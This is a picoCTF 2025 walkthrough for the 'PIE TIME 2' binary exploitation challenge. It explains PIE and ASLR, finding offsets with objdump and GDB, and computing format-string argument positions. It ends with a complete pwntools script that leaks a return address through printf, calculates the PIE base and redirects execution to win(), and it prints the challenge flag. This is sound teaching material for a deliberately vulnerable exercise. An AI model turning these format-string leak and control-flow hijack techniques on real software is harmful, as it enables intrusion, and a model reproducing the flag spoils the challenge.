picoCTF 2025: PIE TIME 2 — Walkthrough

  • Category: Binary Exploitation
  • Difficulty: Medium
  • Key Concepts: PIE (Position Independent Executable), Format String Exploits, x86-64 Stack Layout, Offset Calculation.

What's This Challenge About?

This binary has two bugs that we can chain together to grab the flag.

  1. The Leak (Format String Bug): The program passes our input straight to printf as the format string, printf(buffer), instead of printf("%s", buffer). This means if we throw in %p (pointer), printf will snoop around the CPU registers and stack memory and spill whatever's sitting there. We use this to figure out where the program is actually running in memory.
  2. The Jump (Control Flow Hijack): The program asks for an address through scanf and then jumps to it. If we know where the win() function lives, we just point it there and grab the flag.

The Core Concept: What is PIE?

PIE (Position Independent Executable), working together with ASLR, is a security feature that acts like moving your house every time you run the program.

  • Non-PIE (Static): The house is always at address 100. You can just write "Go to 100" in your exploit and you're golden.
  • PIE (Dynamic): Every time the program runs, the OS picks a random starting address (like 5000, 9000, or 25000) and plops the entire house there.

The trick: Even though the absolute address keeps changing, the layout inside never changes.

  • The kitchen is always 10 steps from the front door.
  • The bedroom is always 50 steps from the front door.

If we can find where the front door is (the Base Address) by peeking at a map (our leak), we can just add "50 steps" to find the bedroom (the Win Function).
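The analogy boils down to a single addition. Here is a minimal sketch in Python using the made-up numbers from the house example; the names locate, KITCHEN_STEPS and BEDROOM_STEPS are purely illustrative and not part of the challenge:

```python
# Fixed layout: distances from the front door never change between runs.
KITCHEN_STEPS = 10
BEDROOM_STEPS = 50


def locate(front_door: int, steps: int) -> int:
    """Absolute position = randomized base (front door) + fixed offset."""
    return front_door + steps


# Three "runs" with the random starting addresses from the analogy.
for front_door in (5000, 9000, 25000):
    kitchen = locate(front_door, KITCHEN_STEPS)
    bedroom = locate(front_door, BEDROOM_STEPS)
    print(f"door={front_door} kitchen={kitchen} bedroom={bedroom}")
```

The absolute numbers differ on every run, but the gap between the door and each room does not, which is exactly what the exploit relies on.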


Phase 2: Looking at the Binary

Before running anything, we check out the binary to measure the "steps" (offsets) between functions. These distances never change.

We need two numbers:

  1. Target Offset: Where the win() function sits relative to the start.
  2. Reference Offset: The offset of the instruction inside main that call_functions returns to.

Command:

objdump -d vuln | grep win
objdump -d vuln | grep -A 30 "main>:"

What we find:

  • win is at offset 0x136a.
  • The instruction right after the call to call_functions in main is at offset 0x1441. This is our Return Address. The call pushes it onto the stack, and when call_functions finishes, the CPU pops it to know where to jump back.

Figure 1: The objdump output shows the static addresses. We can see win lives at offset 136a. The screenshot shows the start of main; in the full output, the call instruction to call_functions appears at 143c, with the return address right after at 1441. These are our "anchors" for the PIE calculation.
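The two anchors are tied together by simple arithmetic. A near call on x86-64 (opcode E8 followed by a 4-byte relative displacement) is 5 bytes long, so the return address is the call's offset plus 5. The sketch below assumes the call at 143c uses that 5-byte encoding, which the 143c to 1441 gap suggests; the constant names are illustrative:

```python
CALL_OFFSET = 0x143C   # offset of the call to call_functions inside main (from objdump)
CALL_REL32_LEN = 5     # assumption: E8 opcode + 4-byte displacement
WIN_OFFSET = 0x136A    # offset of win (from objdump)

# The return address is the instruction immediately after the call.
ret_offset = CALL_OFFSET + CALL_REL32_LEN
print(hex(ret_offset))               # 0x1441

# Distance from the return address back to win; constant on every run.
print(hex(ret_offset - WIN_OFFSET))  # 0xd7
```

If your own objdump output shows a different call offset, recompute both numbers before using them in the exploit.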


Phase 3: Finding It on the Stack

Now we need to figure out exactly where that Return Address (...441) sits on the stack so we can leak it using %p.

Step-by-Step GDB Debugging

  1. Fire up GDB: gdb ./vuln
  2. Set a Breakpoint: We want to pause right before printf runs to see the stack state.
    disassemble call_functions
    # Find where printf gets called and break there
    break *call_functions+80

  3. Run it: run
  4. Input: When prompted, type something distinctive like AAAAAAAA.
  5. Check the Stack: When the breakpoint hits, we look at stack memory. We're hunting for a value ending in 441.
    x/60gx $rsp
    • x: Examine memory.
    • /60gx: Show 60 units, formatted as Giant (64-bit) Hex.
    • $rsp: Start at the Stack Pointer.

The Calculation: Finding the Format String Offset

To find our target on the stack, we need to understand how printf grabs arguments in x86-64:

How Arguments Work in x86-64 (System V ABI):

  • RDI holds the format string itself, so it never shows up as a %p value.
  • Positions 1-5: CPU Registers (RSI, RDX, RCX, R8, R9)
    • %1$p through %5$p read these registers
  • Position 6 onward: Stack memory
    • %6$p reads the first 8-byte value on the stack ($rsp + 0 at the call to printf)
    • %7$p reads the second value ($rsp + 8)
    • %8$p reads the third value ($rsp + 16)
    • And so on...

The Formula:

$$\text{Format Offset} = 6 + \text{Stack Index}$$

Where Stack Index is the position counting from the top of the stack ($rsp at the call to printf), starting at 0.

Step-by-Step:

  1. Find the Target: Look through the GDB stack dump (x/60gx $rsp) for a value ending in 441.
  2. Count the Stack Index:
    • Count how many 8-byte values down from $rsp the target shows up (x/gx prints two values per row)
    • The first value is Index 0, the second is Index 1, etc.
  3. Do the Math:
    • Example: Target found at Stack Index 13
    • Calculation: 6 + 13 = 19
    • Result: Use %19$p
  4. Verify: The leaked value should end in 441 (matching our static offset).

Example:

If we find the return address at $rsp + 0x68:

  • Convert offset to index: 0x68 / 8 = 13 (Stack Index 13)
  • Apply formula: 6 + 13 = 19
  • Use format specifier: %19$p

Heads up: Stack layout can shift between environments (local vs. remote, different GDB versions, compiler flags, etc.). Always double-check your offset in your own GDB session. If the return address appears at Stack Index 14 instead of 13, adjust it: 6 + 14 = 20 → use %20$p.
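The offset-to-specifier conversion can be sketched as a small helper. This assumes the System V convention in which printf's format string occupies RDI, so the first stack slot is position 6; that default is exposed as a parameter (first_stack_position, a name chosen here for illustration) in case your environment behaves differently:

```python
def format_position(rsp_offset: int, first_stack_position: int = 6) -> int:
    """Map a byte offset from $rsp (at the call to printf) to a %N$p position.

    first_stack_position defaults to 6 on the assumption that the format
    string sits in RDI, leaving RSI, RDX, RCX, R8, R9 as positions 1-5.
    """
    if rsp_offset < 0 or rsp_offset % 8 != 0:
        raise ValueError("offset must be a non-negative multiple of 8")
    return first_stack_position + rsp_offset // 8


def specifier(rsp_offset: int) -> str:
    """Build the positional format specifier for a given $rsp offset."""
    return f"%{format_position(rsp_offset)}$p"


print(specifier(0x68))  # %19$p
print(specifier(0x70))  # %20$p
```

Feeding it the offset you read in your own GDB session is a quick way to confirm you counted correctly.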

Figure 2: This GDB screenshot shows stack memory (x/60gx $rsp). By scanning the stack dump, we can spot the return address (ending in 441). Count the 8-byte values from $rsp to find the Stack Index, then add 6 (position 6 is the first stack slot, because RDI holds the format string) to figure out which format specifier to use. In different setups, this index might vary, which is why the script scans multiple offsets.


Phase 4: The Exploit Script

We use Python and pwntools to automate all the math. Here's the full script with comments explaining what's going on.

The "PIE Math"

  1. Leak: The leak shows the return address is currently at, say, 0x7ffeee111441 (an example value).
  2. Calculate Base: We know this instruction should be at 0x1441.
    • Base Address = 0x7ffeee111441 - 0x1441 = 0x7ffeee110000
  3. Calculate Target: We know win is always at 0x136a.
    • Win Address = 0x7ffeee110000 + 0x136a = 0x7ffeee11136a.
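The same arithmetic can be wrapped in a helper that also sanity-checks the result: a correct PIE base is page-aligned, so its low 12 bits must be zero. This is a sketch with illustrative names (rebase, PAGE_MASK), using the example leak value from the steps above:

```python
PAGE_MASK = 0xFFF  # low 12 bits; zero for any page-aligned address


def rebase(leak: int, leak_offset: int, target_offset: int) -> int:
    """Turn one leaked code pointer into the runtime address of another symbol."""
    base = leak - leak_offset
    if base & PAGE_MASK:
        # A misaligned base means the leak was not the pointer we expected.
        raise ValueError(f"base {hex(base)} is not page-aligned")
    return base + target_offset


print(hex(rebase(0x7FFEEE111441, 0x1441, 0x136A)))  # 0x7ffeee11136a
```

Failing loudly on a misaligned base is a cheap way to catch a wrong format offset before sending a bad address to the program.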

The Python Script

from pwn import *

# Connect to the challenge
# Replace with actual host/port or process('./vuln') for local testing
r = remote('rescued-float.picoctf.net', 51808)

# 1. Define the "Blueprint" (Static Offsets)
# These come from our objdump analysis in Phase 2
STATIC_RET_ADDR = 0x1441
STATIC_WIN_ADDR = 0x136a

r.recvuntil(b"Enter your name:")

# 2. Send the Probe
# Wide range to handle environment differences
# Probes format positions %17$p through %23$p, centered around the expected %19$p
# This ensures we catch the leak even if the stack layout is slightly different
payload = b"|%17$p|%18$p|%19$p|%20$p|%21$p|%22$p|%23$p"
r.sendline(payload)

# 3. Parse the Leak
output = r.recvline().decode()
leaks = output.split('|')

leaked_addr = None
for leak in leaks:
    if not leak.strip():
        continue
    try:
        val = int(leak, 16)
        
        # CRITICAL CHECK: (val & 0xFFF)
        # PIE randomization changes the upper bits but keeps page alignment.
        # The last 12 bits (3 hex nibbles) stay constant.
        # If the static address ends in 441, the randomized address MUST also end in 441.
        # This confirms we found the right pointer and not random stack junk.
        if (val & 0xFFF) == (STATIC_RET_ADDR & 0xFFF):
            leaked_addr = val
            print(f"[*] Found Leak: {hex(leaked_addr)}")
            break
    except ValueError:
        continue

if leaked_addr is None:
    print(f"Output received: {output}")
    exit("Leak not found - check your GDB offsets and expand the payload range")

# 4. Do the PIE Math
# Real_Address - Static_Offset = Base_Address
base = leaked_addr - STATIC_RET_ADDR
print(f"[*] PIE Base: {hex(base)}")

# Base_Address + Win_Offset = Real_Win_Address
win = base + STATIC_WIN_ADDR
print(f"[*] Win Address: {hex(win)}")

# 5. Send the payload
r.recvuntil(b"address to jump to")
# Convert the calculated integer back to a hex string
r.sendline(hex(win).encode())

# 6. Get the Flag
r.interactive()

Why the Script Scans Multiple Offsets

The payload |%17$p|%18$p|%19$p|%20$p|%21$p|%22$p|%23$p covers Stack Indices 11 through 17 (position 6 is the first stack slot, because RDI holds the format string):

  • %17$p = 6 + 11 (Stack Index 11)
  • %19$p = 6 + 13 (Stack Index 13)
  • %23$p = 6 + 17 (Stack Index 17)

This range makes sure the script works across different setups where the return address might be at slightly different positions on the stack. The validation check ((val & 0xFFF) == 0x441) automatically picks out the correct leak from the candidates.
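The probe-and-filter idea can be tried offline, without a connection. The sketch below builds the same payload from a range and filters a response line by its low 12 bits; build_probe and pick_leak are illustrative helper names, and the sample line is made up for demonstration, not real program output:

```python
def build_probe(first: int, last: int) -> bytes:
    """Build b"|%17$p|%18$p..." for format positions first..last inclusive."""
    return "".join(f"|%{n}$p" for n in range(first, last + 1)).encode()


def pick_leak(line: str, static_offset: int):
    """Return the first value whose low 12 bits match static_offset, else None."""
    for field in line.split("|"):
        try:
            value = int(field.strip(), 16)
        except ValueError:  # empty field or "(nil)"
            continue
        if (value & 0xFFF) == (static_offset & 0xFFF):
            return value
    return None


print(build_probe(17, 23))

# Made-up sample response: a stack pointer, a null, a code pointer, a small int.
sample = "|0x7ffd1c2b3a40|(nil)|0x55d0c0e21441|0x1\n"
print(hex(pick_leak(sample, 0x1441)))  # 0x55d0c0e21441
```

To widen the scan, only the two numbers passed to build_probe need to change; the filter stays the same.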

Figure 3: The final output of the script. It successfully leaks the address, calculates the PIE base, figures out the current address of win, sends it to the server, and gets the flag picoCTF{p13_5h4u1dn'r_i34k_9c5bb792}.


Wrapping Up

This walkthrough shows a complete PIE bypass using format string exploitation:

  1. Static Analysis: Pull fixed offsets from the binary (win at 0x136a, return address at 0x1441)
  2. Dynamic Analysis: Use GDB to find where the return address appears on the stack
  3. Calculate Offset: Apply the formula Format_Offset = 6 + Stack_Index (RDI holds the format string, so position 6 is the first stack slot)
  4. Exploit: Leak the randomized address, calculate the PIE base, and redirect execution to win()

The key insight: while PIE randomizes absolute addresses, relative offsets between functions stay the same—so once we leak a single known reference point, we can calculate any function's address.